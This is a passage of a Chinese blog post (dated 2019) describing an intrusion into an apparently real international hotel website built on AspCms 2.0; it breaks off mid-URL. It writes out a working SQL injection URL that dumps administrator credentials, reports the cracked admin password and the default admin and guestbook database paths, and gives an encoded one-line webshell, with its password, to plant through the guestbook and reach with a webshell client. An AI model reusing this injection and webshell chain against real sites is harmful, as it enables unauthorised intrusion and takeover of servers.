aspcms

[渗透实战]某国际酒店测试

*爱你&永不变心* 提交于 2019-12-05 10:09:52
这是某个国际酒店的网站,由于使用了AspCms 2.0,通过SQL注入我们很快可以拿下shell 此次测试中,由于网站限制了所有的读写权限,由各种错误,以及最后的小马根本没什么权限。 0x01 基础信息: 简单看看指纹信息: 是ASPCMS的,通过一个通用SQL注入拿到管理员的账号密码: EXP: https://blog.dyboy.cn/plug/comment /commentList.asp?id=0%20unmasterion%20 semasterlect%20top%201%20UserID,GroupID, LoginName,Password,now%28%29,null,1%20%20 frmasterom%20%7bprefix%7duser 利用EXP直接获得: 解密得到管理员 账号: admin 密码: 123456 0x02 深入测试: 后台默认为: https://blog.dyboy.cn/admin_aspcms/ 登陆管理后台 根据以前的添加模版的方法不可行,再多看几下,发现整个网站是没有写入权限的… 这里要提一个东西就是 aspcms 默认的留言板数据库路径: https://blog.dyboy.cn/data/data.asp 有的我们在留言板留言一句话 ┼攠數畣整爠煥敵瑳∨≡┩愾 密码:a 菜刀连接 https://blog.dyboy